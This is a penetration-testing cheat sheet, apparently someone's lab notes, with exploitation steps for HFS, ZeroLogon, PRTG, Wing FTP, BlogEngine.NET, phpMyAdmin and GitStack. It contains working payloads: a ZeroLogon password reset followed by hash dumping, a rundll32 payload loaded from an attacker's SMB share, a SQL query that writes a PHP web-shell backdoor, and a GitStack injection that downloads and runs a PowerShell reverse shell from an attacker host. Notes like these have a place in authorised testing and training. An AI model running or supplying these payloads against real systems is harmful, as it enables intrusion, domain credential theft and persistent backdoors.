CVE-2019-1388: Windows Privilege Escalation Through UAC

• POC: https://www.youtube.com/watch?v=3BQKpPNlTSo

Rejetto HTTP File Server RCE [HFS 2.3]

Exploit: https://www.exploit-db.com/exploits/39161

• Host /usr/share/windows-resources/binaries/nc.exe on attacker's web-server and set-up listener.

• Modify hfsexploit.py with Attacker's IP and Reverse shell Listening Port

• Run exploit : python hfsexploit.py <target-IP> <target-port>

Zero Logon [CVE-2020-1472]

Write-up :https://dirkjanm.io/a-different-way-of-abusing-zerologon/

Exploit: https://github.com/dirkjanm/CVE-2020-1472

#Check for vulnerability
https://github.com/SecuraBV/CVE-2020-1472


#Exploit: Reset Password of DC$ Machine Account to Blank NTLM Hash
python3 cve-2020-1472-exploit.py <HYDRA-DC> <DC-IP>

#Dump hashes [31d6c.. is a blank hash]
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 '<Domain>/<DC-Name$>@<IP>'

In case of error, run the following code:

python3 -m pip install virtualenv
python3 -m virtualenv impkt
source impkt/bin/activate
pip install git https://github.com/SecureAuthCorp/impacket

PRTG Network Monitor [<18.2.39]

• Default credentials : prtgadmin:prtgadmin

• Authenticated RCE Writeup : https://www.codewatch.org/blog/?p=453

Automated Exploit

Link: https://raw.githubusercontent.com/M4LV0/PRTG-Network-Monitor-RCE/master/prtg-exploit.sh

Adds a user to Administrators Group : pentest::P3nT3st

• Login to the app, grab your cookie and add it to the script../exploit.sh -u <Target> -c "<Cookie-value>"

Modify for Reverse Shell

• Let's use metasploit smb_delivery to share the payload via Port 445.

• In exploit.sh, search for pentest to identify payload.

• Replace payload code.[ URL Encode payload]

  • rundll32.exe \10.10.0.172\pbMaor\memorycache.dll,0

  • Encoded:rundll32.exe%20%5C%5C10.10.0.172%5CpbMaor%5Cmemorycache.dll%2C0%0A

Manual Exploit

• Testing for code execution

  • Setup -> Account Settings -> Notifications

  • Parameter: Test; ping -n 1 <IP>

  • On Kali Machine: sudo tcpdump -i tun0 ip proto \\icmp -vv

• Use Powershell one-liners for gaining a foothold.

Wing FTP Authenticated RCE

• Testing for code execution :s

  • sudo tcpdump -i tun0 ip proto \\icmp -vv

  • os.execute('cmd.exe /c ping -n 1 <IP>')

• Try with Metasploit :

  • use multi/script/web_delivery

  • set target 3

BlogEngine.NET

• RCE Affected versions: <3.3.6.0

• CVE-2019-6714

Exploit Write-up : https://blog.gdssecurity.com/labs/2019/3/28/remote-code-execution-in-blogenginenet.html

PHPMyAdmin

• Requires the phpmyadmin page to be accessible.

• Steps to get a reverse shell:

  • Create a new database, and insert the following query : SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\xampp\htdocs\backdoor.php"

• Reference: https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

GitStack RCE

• Identify Repository: GET /rest/repository/

• Identify Users: GET /rest/user/

• Code Execution on password parameter: Use Burp to intercept Basic Auth request:

#Payload:- <User-name>:C && cmd /c powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1')"

GET /web/index.php?p=<Repository name>.git&a=summary HTTP/1.1
Host: 172.31.1.12
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Authorization: Basic <Base64-Encoded Payload>
Connection: close